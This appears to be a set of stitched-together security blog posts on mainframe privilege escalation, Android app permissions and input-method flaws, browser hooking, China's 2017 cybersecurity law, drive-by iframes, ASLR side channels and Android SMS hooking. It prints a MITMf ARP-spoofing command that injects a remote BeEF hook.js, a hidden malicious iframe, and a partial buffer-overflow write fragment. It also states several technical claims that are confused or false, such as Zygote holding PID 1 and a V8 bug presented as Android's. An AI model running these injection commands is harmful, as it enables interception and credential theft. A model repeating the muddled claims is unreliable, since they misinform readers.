Do you think Mainframe forever secure in cyber world?


IBM z/OS assumed to be secure because it have ACF2 & RACF.

Mainframe access control types:

RACF – Resource Access Control Facility or RACF® provides the tools to help the installation manage access to critical resources.

ACF2 – (Access Control Facility) is a commercial, discretionary access control software security system developed for the MVS (z/OS today), VSE (z/VSE today) and VM (z/VM today)

Start discussion

Why we have this discussion topic today? We all known IBM z/OS is a proprietary OS. The Enterprise firms especially Banking and Finance group They are relies on mainframe comupter to do the handle the high volume of electronic transaction procoess.

A term so called operation day end process, it is well known job process in banking finance, broker firm and insurance industries.

Since Mainframe responsible for the back end job and therefore the modern Java apps with front end web application not direct communicate with this giant (see below diagram for reference). The inquiry and data download will be responsible by middle tier. Such architecture implementation not require high risk components especially Java components did not install on top of mainframe partition (LPAR).

As times goes by, Unified Computing System techniques like from virtual storage integrate to cloud computing and run in wide range of coverage. Actually mainframe is the pioneer of Unified Computing System technology. Since 2000 IBM z/OS (MVS) capable to support more than one OS running on top on the machine. It can be partitioned into multiple logical partitions, each hosting a separate operating system. A logical partition, commonly called an LPAR, is a subset of a computer’s hardware resources, virtualized as a separate computer.

Vulnerability not the proprietary of Microsoft OS and Linux OS

The penetration test performed by Mark Wilson on 2013. There are over 100 vulnerabilities found on z/OS even 1.13. The weakness of z/OS happened in the following area:

  • Poor APF Library protection
  • Poor SURROGAT profiles
  • Poorly coded SVC’s

Reference: z/OS V1R1 was first introduced in October 2000, z/OS Initial release on March 30, 2001 , Version 2.2 (V2R2) introduced on June 28, 2015. On February 21, 2017 IBM z/OS Version 2 Release 3 go to the market and available to use.

Hold different opinion on vulnerability

My assumption base on the security findings of a security auditor (Ayoub Elaassal) from Black Hat conference in Las Vegas.  His finding is that the ASM program updates the ACEE block in memory to give temporary SPECIAL privilege and causes privileges escalation. Hints that if you want to manually specify the user getting the SPECIAL privilege, replace userid() with any user in line 104 (see below command syntax for reference)

QUEUE "/*"
 QUEUE "/*"
 QUEUE "//*"

Ayoub Elaassal create a utility to test the privileges escalation on z/OS.  The file name of the utility is ELV.APF.

***The authorized program facility (APF) helps your installation protect the system. APF-authorized programs can access system functions that can affect the security and integrity of the system. APF-authorized programs must reside in APF-authorized libraries, which are defined in an APF list, or in the link pack area.

However any misconfiguration will make a castle become a unsecured house…..But our study bring me consider of the malware infection on non IBM CISC environment especially Windows server environment and Linux environment!

If above speculation is true. The z/OS system will be encountered of the following security problem.

It looks that IBM need to cope with IT world trend. CISC system environment capable of Java framework. CICS uses the IBM 64-bit SDK for z/OS, Java Technology Edition.  Regarding to our earlier discussion, 64 bit OS environment not absolute avoid malware infection. Even though you apply ASLR technology, sometimes a open source or 3rd party application will bring up operation problem causes system developer to modify the core system source code and not aware to create the vulnerability.  We all known business driven the IT world instead of technology or Information security.

Visitor who will be interested of the report of mainframe penetration tool, please visit GitHub to find out the details.

….let me find out more information security items and share with you soon! Bye!




Price of your privacy – mobile phone


Google Pinyin,QQ,TouchPal,Sogou IME apps has high volume download volume in Google Play store. However user may also be vulnerable to component-hijacking attacks. Do you think whether there are more apps monitor your mobile phone silently!

Start discussion:

We heard technical terms so called predictive search and auto-correction. Google browser (Chrome) keyboard input feature apply similar technologies.

What is predictive search?

Google’s search feature uses a predictive search algorithm based on popular searches to predict a user’s search query. It requires interconnect with Google system.

What is auto-correction?

Auto correction is a feature in which an application predicts the rest of a word a user is typing. It requires interconnect with Google system.

Reality – existing situation in the market 2017

It looks that above criteria make sense, user are allow to disable this function. If mobile owner forgot to enforce the access permission setting. Seems their personal information will be forward to google during web site visiting. Their goal is going to do the web behavior analytic. As far as I know, the applications like google app, Google Zhuyin input, Google  Pinyin input  are maintain the following spy able permissions.

Google App – Reads Browser Bookmarks, Knows location by Cell-ID and WiFi, Knows location by GPS signal, Runs on device startup, Reads all SMS messages and records audio on voice calls

Google Zhuyin Input – Records Audio on Voice Calls, Runs on device startup

Google Pinyin Input – Records Audio on Voice Calls, Runs on device startup

MiTalk (China users) – knows location by GPS signal, Received all SMS messages, Records Audio on Voice calls, Knows location by Cell-ID and WiFi, Handles Outgoing calls and Runs on device startup

Attention –  critical loophole

In 2015, a group of researcher in Chinese university of Hong Kong (Wenrui Diao, Xiangyu Liu, Zhe Zhou, Kehuan Zhang, Zhou Li) found a vulnerability on Pinyin input. A vulnerability so called cross-app KeyEvent injection (CAKI) attack will be encountered on Google Pinyin input method. The flaw is that it allow 3rd party to harvest entries from the personalized user dictionary of IME through an ostensibly innocuous app only asking for common permissions.

Android CAKI vulnerability


We keep track of android vulnerabilities so far. I note with concerns of CVE-2016-9651.  This vulnerability is allow to collect the Invisible Private Property on your android phone. Details is shown as below:

Get all properties of an special object by d8 shell command

d8> var specialObject = new Error("test");
d8> var ownNames = Object.getOwnPropertyNames(specialObject);
d8> var ownSymbols = Object.getOwnPropertySymbols(specialObject);
d8> var ownKeys = ownNames.concat(ownSymbols)
d8> ownKeys
["stack", "message"] ---------> all public properties got by normal JavaScript
d8> %DebugPrint(specialObject)
DebugPrint: 0x3058e8cd: [JS_ERROR_TYPE]
- map = 0x53d0945d [FastProperties]
- prototype = 0x2560b9e1
- elements = 0x45384125 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS]
- properties = { ---------> all properties got by DebugPrint
#stack: 0x453d012d <AccessorInfo> (accessor constant)
#message: 0x453bb18d <String[4]: test> (data field at offset 0)
0x453859f1 <Symbol: stack_trace_symbol>: 0x3058e9c1 <JS Array[6]> (data field at offset 1) ---------> private property

If above flaw co-exists with this vulnerability. Sounds like a prefect surveillance backdoor allow 3rd to collect the information of your android phone. As a matter of fact, the surveillance program or cyber espionage keep track of our mobile activities daily. If such action is collected by your government for crime prevention purpose or big data foundation framework. From certain point of view, we have no doubt to say no. However, who can say how much is the value your personal privacy on your mobile phone?


Mobile phone applications – access permission component

Application must have an AndroidManifest.xml file in its root directory. The manifest file provides essential information about your app to the Android system, which the system must have before it can run any of the app’s code. Manifest file capable declares the permissions (see below) that the application must have in order to access protected parts of the API and interact with other applications. It also declared the permissions that others are required to have in order to interact with the application components.

Sample – Manifest file capable declares the permissions

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android=""
android:versionName="1.0" >

    android:targetSdkVersion="18" />

<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
<uses-permission android:name="com.example.towntour.permission.MAPS_RECEIVE" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.CALL_PHONE" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="" />

Mobile apps like your wife or girlfriend. They are tracing you!






The incentive of caching & Web browser exploitation – Hacker benefit



Bring up hypothesis boldly while prove it conscientiously and carefully.  We hypothesis cyber criminal case objective to steal the data. The gatekeeper is the credential. For instance user password. We known that the enhancement of authentication was added to specifics technology. Yes, it is a personal electronic certificate. Do you think whether the criminal will be focused on client side since it will be more easy to collect the information?

Concept of theory – according to BeEF (The Browser Exploitation Framework Project)

Hook the web browser are operating in two different technique. They are ….. (see below):


BeEF ( Browser Exploitation Framework)

The BeEF hook is a JavaScript file hosted on the BeEF server  that needs to run on client browsers. The hook mechanics looks straight forward that it embedded parameters (see below) on a web page lure victim execute (click). It re-direct the victim connection to BeEF server afterwards. As a result it can collect the information on browser includes the credential.

<script src=”” type=”text/javascript”></script>

Reminder: BeEF is a platform which you can use to generate and deliver payloads directly to the target web browser. The BeEF attack tool is written in the Ruby programming language.


MITMf (man in the middle attack framwork)

Hacker can make use of different tool to do the MITM. BeEF server contained the specific feature. Below simple idea of script objective injected the hook.js script into the websites that the target visited.

mitmf --spoof --arp -i <interface> --gateway <router IP> --target <target IP> --inject --js-url <hook.js URL>

Reminder: An MITM attack is only possible if you have control over the network between the victim and server.

What  is the incentive in between hook and cache?

We known that our web browser contained many information. Even though you do not save the password and user ID. However web surfing history will be recorded until you clear manually or purge the data by configuration setting. Human will be step down their alert until incident happen. So sometimes it provides a way to bad guy doing some jobs silently. Let’s take a closer looks of our assumption.

Our virtual reality assumption
  1. See below diagram (wan accelerator architecture and handshake diagram), hook the browser can investigate the traffics and do a passive information gather to receive the understand of the operation peers.

WAN accelerator architecture and handshake diagram

Network caching technology conceptual diagram

2. Network caching technology is hard to avoid vulnerability occurs. For instance CVE-2017-7307 proof that Riverbed RiOS before 9.0.1 does not properly restrict shell access in single-user mode, which makes it easier for physically proximate attackers to obtain root privileges and access decrypted data by replacing the /opt/tms/bin/cli file.

3. We understand that this is an vendor appliance design OS design limitation. However hacker can relies on hook to the browser advantage learn the details and find their target. They can relies on  this vulnerability do more works to steal the information.  A malware out break to more client machine might happen in such circumstances (see below picture – Cache system has been compromised) since the data contained in cache has been compromised.

Cache system has been compromised


To setup a comphensive prevention detection system, priority to do is know how to hack. Since hacker might know what is the benefits on their side. As a matter of fact a enterprise stated that they employ hacker to become thier cyber security team member. My observation is that IT security industry looks changing the shape. The security team key responsibility is doing report creation works, project and vendor management on projects. But this is not the way!






Greater China – New version of cyber security law with effective 1st June 2017



It make foreign countries enterprise firm nervous that new cyber security law with effective 1st June 2017. The Article 5 looks with powerful privileges which causes solicitor, data privacy expert headache!

Let take a closer look of Article 5 (see below):

Article 5 The state shall take measures to monitor, defend against and deal with cybersecurity risks and threats from both inside and outside the territory of the People’s Republic of China, protect critical information infrastructure from attack, intrusion, interference and damage, punish illegal criminal activities on the network in accordance with the law, and maintain cyberspace security and order.

Techincal view point: In the sense that even though your web hosting not located in Greater China area once there is one endpoint located in Greater China the computer owner require to follow the new law.

Technical support criteria: Such surveillance process not difficult to do. A common network break through technique is man-in-the-middle. The data will be under monitor once owner provide web server enterprise e-cert, IPsec VPN pre-share secret or VPN certificate. The great wall will start the monitoring function.

Not surprised! It required to follow their law once you are going to do the business in China! Below is the cyber security law details for your reference.

2017 cyber security law for reference

General Provisions – 總則

Article 1 This Law is developed for the purposes of guaranteeing cybersecurity, safeguarding cyberspace sovereignty, national security and public interest, protecting the lawful rights and interests of citizens, legal persons and other organizations, and promoting the sound development of economic and social informatization.

第一條 為了保障網絡安全,維護網絡空間主權和國家安全、社會公共利益,保護公民、法人和其他組織的合法權益,促進經濟社會信息化健康發展,制定本法。

Article 2 This Law shall apply to the construction, operation, maintenance and use of the network as well as the supervision and administration of cybersecurity within the territory of the People’s Republic of China.

第二條 在中華人民共和國境內建設、運營、維護和使用網絡,以及網絡安全的監督管理,適用本法。

Article 3 The state shall lay equal stress on cybersecurity and information-based development, follow the guidelines of positive use, scientific development, legal management and security guarantee, promote the construction of network infrastructure and interconnection, encourage the innovation and application of network technologies, support the cultivation of cybersecurity talents, establish and improve the cybersecurity guarantee system, and enhance the capability to protect cybersecurity.


Article 4 The state shall develop and continuously improve cybersecurity strategies, specify the basic requirements and major objectives for guaranteeing cybersecurity, and propose cybersecurity policies, work tasks and measures in key fields.

第四條 國家製定並不斷完善網絡安全戰略,明確保障網絡安全的基本要求和主要目標,提出重點領域的網絡安全政策、工作任務和措施。

Article 5 The state shall take measures to monitor, defend against and deal with cybersecurity risks and threats from both inside and outside the territory of the People’s Republic of China, protect critical information infrastructure from attack, intrusion, interference and damage, punish illegal criminal activities on the network in accordance with the law, and maintain cyberspace security and order.


Article 6 The state shall advocate honest, faithful, healthy and civilized network conduct, advance the spreading of core socialist values, and take measures to enhance the awareness and level of cybersecurity of the entire society, so as to form a favorable environment for promoting cybersecurity with the participation of the entire society.

第六條 國家倡導誠實守信、健康文明的網絡行為,推動傳播社會主義核心價值觀,採取措施提高全社會的網絡安全意識和水平,形成全社會共同參與促進網絡安全的良好環境。

Article 7 The state shall actively carry out international exchange and cooperation in terms of cyberspace governance, research and development of network technologies, formulation of standards thereof, and crackdown on illegal crimes committed on the network and other aspects, promote the construction of a peaceful, safe, open and cooperative cyberspace, and establish a multilateral, democratic and transparent system for cyber governance.


Article 8 The national cyberspace administration shall be responsible for the overall planning and coordination of cybersecurity work and relevant supervision and administration. The competent telecommunications department of the State Council, public security departments and other relevant authorities shall be responsible for cybersecurity protection, supervision and administration within the scope of their respective functions in accordance with the provisions of this Law and other relevant laws and administrative regulations.

第八條 國家網信部門負責統籌協調網絡安全工作和相關監督管理工作。國務院電信主管部門、公安部門和其他有關機關依照本法和有關法律、行政法規的規定,在各自職責範圍內負責網絡安全保護和監督管理工作。

Article 9 Network operators shall, when conducting business operations and providing services, abide by laws and administrative regulations, respect social morality, observe business ethics, have good faith, perform the cybersecurity protection obligation, accept supervision by the government and the public, and undertake social responsibilities.

第九條 網絡運營者開展經營和服務活動,必須遵守法律、行政法規,尊重社會公德,遵守商業道德,誠實信用,履行網絡安全保護義務,接受政府和社會的監督,承擔社會責任

Article 10 For the construction and operation of the network or the provision of services through the network, technical measures and other necessary measures shall be taken in accordance with the provisions of laws and administrative regulations and the compulsory requirements of national standards to ensure the safe and stable operation of the network, effectively respond to cybersecurity incidents, prevent illegal criminal activities committed on the network, and maintain the integrity, confidentiality and availability of network data.


Article 11 Network-related industry organizations shall, in accordance with their charters, intensify industry self-discipline, formulate codes of conduct on cybersecurity, direct their members to strengthen cybersecurity protection, raise the level of cybersecurity protection, and promote the sound development of the industry.

第十一條 網絡相關行業組織按照章程,加強行業自律,制定網絡安全行為規範,指導會員加強網絡安全保護,提高網絡安全保護水平,促進行業健康發展。

Article 12 The state shall protect the rights of citizens, legal persons and other organizations to use the network in accordance with the law, promote the popularity of network access, provide better network services, provide the public with safe and convenient network services, and guarantee the orderly and free flow of network information in accordance with the law. Any individual or organization using the network shall comply with the Constitution and laws, follow public order and respect social morality, shall not endanger cybersecurity, and shall not use the network to conduct any activity that endangers national security, honor and interest, incites to subvert the state power or overthrow the socialist system, incites to split the country or undermine national unity, advocates terrorism or extremism, propagates ethnic hatred or discrimination, spreads violent or pornographic information, fabricates or disseminates false information to disrupt the economic and social order, or infringes upon the reputation, privacy, intellectual property rights or other lawful rights and interests of any other person.

第十二條 國家保護公民、法人和其他組織依法使用網絡的權利,促進網絡接入普及,提升網絡服務水平,為社會提供安全、便利的網絡服務,保障網絡信息依法有序自由流動。任何個人和組織使用網絡應當遵守憲法法律,遵守公共秩序,尊重社會公德,不得危害網絡安全,不得利用網絡從事危害國家安全、榮譽和利益,煽動顛覆國家政權、推翻社會主義制度,煽動分裂國家、破壞國家統一,宣揚恐怖主義、極端主義,宣揚民族仇恨、民族歧視,傳播暴力淫穢色情信息,編造、傳播虛假信息擾亂經濟秩序和社會秩序,以及侵害他人名譽、隱私、知識產權和其他合法權益等活動。

Article 13 The state shall support the research and development of network products and services that are conducive to the healthy growth of minors, legally punish the activities that damage the physical and mental health of minors by using the network, and provide a safe and healthy network environment for minors.

第十三條 國家支持研究開發有利於未成年人健康成長的網絡產品和服務,依法懲治利用網絡從事危害未成年人身心健康的活動,為未成年人提供安全、健康的網絡環境。

Article 14 Any individual or organization shall have the right to report the conduct that endangers cybersecurity to the cyberspace administration, telecommunications department, public security authority, and other departments. The department that receives the report shall handle such a report in a timely manner in accordance with the law, or transfer the report to the competent department in a timely manner if it falls outside its responsibility. The relevant department shall keep confidential the information on the informant, and protect the informant’s lawful rights and interests.

第十四條 任何個人和組織有權對危害網絡安全的行為向網信、電信、公安等部門舉報。收到舉報的部門應當及時依法作出處理;不屬於本部門職責的,應當及時移送有權處理的部門。有關部門應當對舉報人的相關信息予以保密,保護舉報人的合法權益

Cybersecurity Support and Promotion – 網絡安全支持與促進

Article 15 The state shall establish and improve the system of cybersecurity standards. The standardization administrative department of the State Council and other relevant departments of the State Council shall, according to their respective functions, organize the formulation of and revise at appropriate time national and industry standards relating to cybersecurity administration and the security of network products, services and operations. The state shall support enterprises, research institutions, institutions of higher learning, and network-related industry organizations in participating in the formulation of national and industry standards on cybersecurity.

第十五條 國家建立和完善網絡安全標準體系。國務院標準化行政主管部門和國務院其他有關部門根據各自的職責,組織製定並適時修訂有關網絡安全管理以及網絡產品、服務和運行安全的國家標準、行業標準。國家支持企業、研究機構、高等學校、網絡相關行業組織參與網絡安全國家標準、行業標準的製定。

Article 16 The State Council and people’s governments of provinces, autonomous regions and municipalities directly under the Central Government shall make overall planning, increase input, support key cybersecurity technology industries and projects, support the research, development and application of cybersecurity technologies, popularize safe and reliable network products and services, protect the intellectual property rights of network technologies, and support enterprises, research institutions, and institutions of higher learning, among others, in participating in national innovation projects on cybersecurity technologies.


Article 17 The state shall boost the construction of a socialized service system for cybersecurity, and encourage relevant enterprises and institutions to provide such security services as cybersecurity authentication, detection and risk assessment.

第十七條 國家推進網絡安全社會化服務體系建設,鼓勵有關企業、機構開展網絡安全認證、檢測和風險評估等安全服務。

Article 18 The state shall encourage the development of technologies for protecting and using network data, promote the availability of public data resources, and promote technological innovation and social and economic development. The state shall support the innovation of cybersecurity management methods and the application of new network technologies to enhance cybersecurity protection.

第十八條 國家鼓勵開發網絡數據安全保護和利用技術,促進公共數據資源開放,推動技術創新和經濟社會發展。國家支持創新網絡安全管理方式,運用網絡新技術,提升網絡安全保護水平。

Article 19 People’s governments at all levels and their relevant departments shall organize regular cybersecurity publicity and education, and direct and urge relevant entities to conduct cybersecurity publicity and education in an effective manner. Mass media shall offer pertinent cybersecurity publicity and education to the public.

第十九條 各級人民政府及其有關部門應當組織開展經常性的網絡安全宣傳教育,並指導、督促有關單位做好網絡安全宣傳教育工作。大眾傳播媒介應當有針對性地面向社會進行網絡安全宣傳教育

Article 20 The state shall provide support to enterprises, institutions of higher learning, vocational schools and other education training institutions to conduct cybersecurity-related education and training, take multiple means to cultivate cybersecurity talents, and promote the exchange of cybersecurity talents.

第二十條 國家支持企業和高等學校、職業學校等教育培訓機構開展網絡安全相關教育與培訓,採取多種方式培養網絡安全人才,促進網絡安全人才交流。

Network Operation Security – 網絡運行安全

Section 1 General Provisions – 一般規定

Article 21 The state shall implement the rules for graded protection of cybersecurity.Network operators shall, according to the requirements of the rules for graded protection of cybersecurity, fulfill the following security protection obligations, so as to ensure that the network is free from interference, damage or unauthorized access, and prevent network data from being divulged, stolen or falsified.

(1) Developing internal security management rules and operating procedures, determining the persons in charge of cybersecurity, and carrying out the responsibility for cybersecurity protection.

(2) Taking technical measures to prevent computer viruses, network attack, network intrusion and other acts endangering cybersecurity.

(3) Taking technical measures to monitor and record the status of network operation and cybersecurity incidents, and preserving relevant weblogs for not less than six months as required.

(4) Taking measures such as data categorization, and back-up and encryption of important data.

(5) Performing other obligations as prescribed by laws and administrative regulations.

第二十一條 國家實行網絡安全等級保護製度。網絡運營者應當按照網絡安全等級保護製度的要求,履行下列安全保護義務,保障網絡免受干擾、破壞或者未經授權的訪問,防止網絡數據洩露或者被竊取、







Article 22 Network products and services shall comply with the compulsory requirements of relevant national standards. Providers of network products and services shall not install malware. When a provider discovers any risk such as security defect and vulnerability of its network products or services, it shall immediately take remedial measures, inform users in a timely manner, and report it to the competent department in accordance with relevant provisions. Providers of network products and services shall continuously provide security maintenance for their products and services, and shall not terminate the provision of security maintenance within the stipulated period or the period agreed upon by the parties. Where network products and services have the function of collecting users’ information, their providers shall explicitly notify their users and obtain their consent. If any user’s personal information is involved, the provider shall also comply with this Law and the provisions of relevant laws and administrative regulations on the protection of personal information.

第二十二條 網絡產品、服務應當符合相關國家標準的強制性要求。網絡產品、服務的提供者不得設置惡意程序;發現其網絡產品、服務存在安全缺陷、漏洞等風險時,應當立即採取補救措施,按照規定及時告知用戶並向有關主管部門報告。網絡產品、服務的提供者應當為其產品、服務持續提供安全維護;在規定或者當事人約定的期限內,不得終止提供安全維護。網絡產品、服務具有收集用戶信息功能的,其提供者應當向用戶明示並取得同意;涉及用戶個人信息的,還應當遵守本法和有關法律、行政法規關於個人信息保護的規定。

Article 23 Key network equipment and specialized cybersecurity products shall, in accordance with the compulsory requirements of relevant national standards, pass the security certification conducted by qualified institutions or meet the requirements of security detection before being sold or provided. The national cyberspace administration shall, in conjunction with relevant departments of the State Council, develop and release the catalogue of key network equipment and specialized cybersecurity products, and promote the mutual recognition of security certification and security detection results to avoid repeated certification and detection.

第二十三條 網絡關鍵設備和網絡安全專用產品應當按照相關國家標準的強制性要求,由具備資格的機構安全認證合格或者安全檢測符合要求後,方可銷售或者提供。國家網信部門會同國務院有關部門製定、公佈網絡關鍵設備和網絡安全專用產品目錄,並推動安全認證和安全檢測結果互認,避免重複認證、檢測。

Article 24 Where network operators provide network access and domain registration services for users, handle network access formalities for fixed-line or mobile phone users, or provide users with information release services, instant messaging services and other services, they shall require users to provide true identity information when signing agreements with users or confirming the provision of services. If any user fails to provide his or her true identify information, the network operator shall not provide him or her with relevant services. The state shall implement the strategy of credible identity in cyberspace, support the research and development of safe and convenient technologies for electronic identity authentication, and promote mutual recognition among different electronic identity authentication technologies.


Article 25 Network operators shall make emergency response plans for cybersecurity incidents, and deal with system bugs, computer viruses, network attack, network intrusion and other security risks in a timely manner. When any incident endangering cybersecurity occurs, the relevant operator shall immediately initiate the emergency response plan, take corresponding remedial measures, and report it to the competent department in accordance with relevant provisions.


Article 26 Such activities as cybersecurity authentication, detection and risk assessment shall be conducted, and cybersecurity information on system bugs, computer viruses, network attack, and network intrusion, among others, shall be released to the public in accordance with relevant provisions of the state.

第二十六條 開展網絡安全認證、檢測、風險評估等活動,向社會發布系統漏洞、計算機病毒、網絡攻擊、網絡侵入等網絡安全信息,應當遵守國家有關規定。

Article 27 No individual or organization may conduct any activity endangering cybersecurity, such as illegally intruding into any other person’s network, interfering with the normal functions of any other person’s network, and stealing network data, or provide programs or tools specifically used for conducting activities endangering cybersecurity, such as network intrusion, interference with normal functions and protective measures of the network, and stealing of network data. Whoever knows that any other person conducts any activity endangering cybersecurity shall not provide technical support, advertising promotion,payment and settlement services or any other assistance to such a person.


About apple Mac security topic – Does it a Trojan horse or administrator negligence?


In regards to the subject matter, below details is a short discussion and therefore not require to written in details long form. Enjoy!


Once upon a time. The Greek army going to breakthrough the Troy city defense mechanism. A group of army  hide themselves inside a horse…….

Discussion topic – malware bypasses gatekeeper 

Sound strange! Heard that the malware can bypass apple computer detection mechanism, said macdailynews. It is hard to imagine that how’s the hacker can do this magic?

As far as I know, similar scenario type of cyber attack aim to bypass defense mechanism was happened in past. But it is a non apple OS platform. Hacker relies of iframe programming technique (see below program syntax). The method is that hacker is going to find a vulnerable web site which did not have implement content security control. They will embeds a malicious iframe code snippet in this website page. When anyone visits that page, the hidden iframe code secretly downloads and installs a Trojan or a malware such as key-logger on the unsuspecting user’s computer, if his computer is not adequately protected. The web site will unintended become a malicious host in the long run if the web admin not aware. As a result the host will be include in the abuse by internet community and put his domain record into black list.

Program syntax

<iframe src="" width=100% height=0></iframe>

Remark: Some sort of vulnerability scanner evaluate the iframe attack and categorize in medium severity.

Do you think there is a need to change the severity level now?

Malicious code embedded on enterprise certificate file

We kno wn that generate ecert is a straight forward process. The server administrator generate a CSR file on server side. Then SSL certificate vendor provides the certificate files afterwards according to CSR file. From technical point of view, the contents contains in certificate file is not a human readable language. And therefore web server administrator less check the details in general circumstances. It is hard to imagine that bad guy relies on this matter to do the criminal work. For example, embedded code in the certificate file. The benefits is that this malicious activities will be protected by default encryption mechanism. The malicious traffic will be pass through the defense mechanism cross check. And such away fooling the detection and preventive control .

Sample: Below SSL enterprise certificate file indicate that the application can install additional apps that were signed with this certificate. In the sense that it can bypass defense mechanism by Apple.


As we know, information security is a continuous program. Above 2 risk items (iframe attack (Clickjacking) and e-cert embedded with abnormal program syntax) bring the following idea for our reference.

1. Do not ignore the vulnerability management program about iFrame vulnerability

2. During the e-cert installation, a better idea to use online tools to verify the e-cert. You can find the online verification tools on internet. For example: Symantec


Copy – He is great partner of virtual machine but he can kill VM simultaneously – address space layout randomization

Announcement – Since the original post encountered slow response issue. In order to keep the comments input by visitors. We are going to keep the original post. This post is cater for visitor who can’t access the original web page. Please accept our apologizes that has been made.



The trend in IT world running into virtual world nowadays. Even though your mobile phone operation system is run on top of virtual machine. The memory resources utilization from tradition static to dynamic since virtual machine architecture founded. Security experts worries about infiltration of malware on virtual machine. A mitigation step introduce on VMware since 2014. The system designer conducted a technology alleged address space layout randomization. As a result it avoid malware implant to kernel since no living place for the malware alive (see below – a statement on technical article point out that how ASLR bring in the value)

The VMware ESXi kernel uses an address space layout randomization (ASLR) methodology to provide random and unpredictable addresses for user-mode applications, drivers, libraries and other executable components. This is a significant security benefit because of the way ASLR thwarts malware looking to take advantage of memory-based exploits. The malware would not have a known address to use as a vector for the exploit because of the randomization.

As times goes by, ASLR not even is the assistance of virtual machine designer. On the other hand, he will become a killer to kill his master. But this fact is not a news today. Regarding to the technology expertise experimental studies, it is possible to execute a attack on kernel side through malicious Java application. The method is a kind of side-channel attack (side-channel attacks) and based on the definition of indirect addresses to which had previously been handling when traversing page tables memory processor unit MMU (Memory Management Unit) in the translation of virtual memory addresses to physical memory addresses. Since cache CPU general and it is recognized as an active application or activity the MMU, then by evaluating differences in data access time before and after resetting the cache (the attack variety “EVICT + TIME”) can with high probability to choose the address and able to detect the locations since it is under the operation of memory management unit.

By breaking ASLR, an attacker will know where code executes, and prepare an attack that targets the same area of the memory, stealing sensitive information stored in the computer’s memory.

The vulnerability channel found on web browser announced by Professor of Computer Science at Cornell Tech on Jan 2016.

When attacking browsers, may be able to insert arbitrary objects into the victim’s heap. Let’s focus on web browser design fundamental.

Web applications communicate with each other through system calls to the browser kernel. As we know, web applications exist in separate processes owned by the browser kernel, they are prohibited from communicating with each other, except through the browser kernel.


However Plugins are less reliable than browsers.

However Plugins are less reliable than browsers


As a matter of fact, Java script is the helper of ASLR vulnerability. Sounds like java-script is an accomplice. The murderer is plug in application.

But in which situation virtual machine will be compromise of this vulnerability?

From technical point of view hacker engage a cyber attack targets workplace on memory area we understood that it is a malware form style attack.  As we know, AMD architecture define a feature named SVM instruction set.  AMD virtualization technology, codenamed “Pacifica,” introduces several new instructions and modifies several existing instructions to facilitate the implementation of VMM systems.
The SVM instruction set includes instructions to:

Start execution of a guest (VMRUN)
Save and restore subsets of processor state (VMSAVE,VMLOAD)
Allow guests to explicitly communicate with the VMM (VMMCALL)
Set and clear the global interrupt flag (STGI, CLGI)
Invalidate TLB entries in a specified ASID (INVLPGA)
Read and write CR8 in all processor modes
Secure init and control transfer with attestation (SKINIT)

Remark: Fundamentally, VMMs (Hypervisor) work by intercepting and emulating in a safe manner sensitive operations in the guest (such as changing the page tables, which could give a guest access to memory it is not allowed to access).


As such,  you are more free to run on memory address space once AMD-V is enabled in the BIOS (or by the host OS).


Below confirmed CVEs looks headaches to virtual machine core designers (VMWARE, VBOX, Hyper-V), right?

  • CVE-2017-5925 for Intel processors
  • CVE-2017-5926 for AMD processors
  • CVE-2017-5927 for ARM processors
  • CVE-2017-5928 for a timing issue affecting multiple browsers

Since founded AnC attack (EVICT+TIME), it  can detect which locations in the page table pages are accessed during a page table walk performed by the MMU.  In the sense that it such a way broken the ASLR feature on virtual machine. The objective of ASLR mainly avoid malware infection on virtual machine. What scenario we can foreseen tomorrow!

Sample: Java code with execute arbitrary memory write

// prepare buffer with address we want to write to
ptrBuf = ""
// fill buffer: length = relative ptr address - buffer start + ptr offset
while (ptrBuf.length < (0x????? - 0x9????? + 0xC)){ptrBuf += "A"}
ptrBuf += addr

// overflow buffer and overwrite the pointer value after buffer

// use overwritten pointer to conduct memory write of 4 bytes
obj.SetFontName("\xbe\xba\xfe\xca") // WHAT TO WRITE
alert("Check after write:0x???????? + 0x?






Mobile apps like your wife or girlfriend. They are tracing you!



Power is always dangerous…..Android rule the world


About mobile phone security

Independently conducted by antihackingonline

The attack hit rate on personal mobile devices rate high. Mobile phone user enjoy to play the game apps. In order to fulfill the application requirement, their web browser require enable the plugins like Flash and Java in order to display some interactive content.

Culprit – Android OS (Zygote)

Zygote is a software component of the Android operating system uses to start apps.  The mechanism of the Zygote process will create a process (System call fork() is used to create processes), and the child process continues where it left off, loading the app itself into the VM.

ActivityThread,main() – see below

public static void main(String[] args) {
    //Create the main thread looper

    ActivityThread thread = new ActivityThread();
    //attach To the system process

    if (sMainThreadHandler == null) {
        sMainThreadHandler = thread.getHandler();

    //The main thread enters the loop state

    throw new RuntimeException("Main thread loop unexpectedly exited");

Zygote require root permissions on Android OS but it is an inherit right. And therefore Process ID is 1.

Remark: ID 1: init process, invoked by the kernel at the end of the bootstrap procedure.

Android zygote security weaknesses caused by performance design

An evaluation program found that the Address Space Layout Randomization (ASLR) not effectively implement in Android OS. As a result , it leaving software components vulnerable to attacks that bypass the protection. Zygote process creation model causes two types of  memory  layout  sharing  on  Android,  which  undermine  the effectiveness of ASLR. Firstly, the code of an application is always loaded at the exact same memory location across different runs even when  ASLR  is  present;  and  secondly,  all  running apps  inherit  the  commonly  used  libraries  from  the  Zygote process (including the libc library). For more details about the weakness of ASLR on VM. Please refer to below URL for reference.

Copy – He is great partner of virtual machine but he can kill VM simultaneously – address space layout randomization


Remark: Android 7.0 or above, library load order randomization and ASLR improved. The major improvement goal increase randomness feature. As a result it makes some code-reuse attacks decrease successful rate.

Inline hooking – Inline hooking is a method of intercepting calls to target functions. For instance, prepares hooks for the following system properties.

  • java.lang.System.getProperty()

If the software developer would like to obtains SMS data on your mobile phone (Android), he can do the following steps.

  1. Manages SMS operations such as sending data

    void sendDataMessage (String destinationAddress, 
                    String scAddress, 
                    short destinationPort, 
                    byte[] data, 
                    PendingIntent sentIntent, 
                    PendingIntent deliveryIntent)

    2. The null pointer exception is directly linked to name. i.e. isms or isms2.

    3. The transact() method is redefined in the customized program “isms” (or isms2) binder realization, replacing the original.

    4. When the parent application of the customized program sends an SMS it leads to the call of the customized program transact() method.

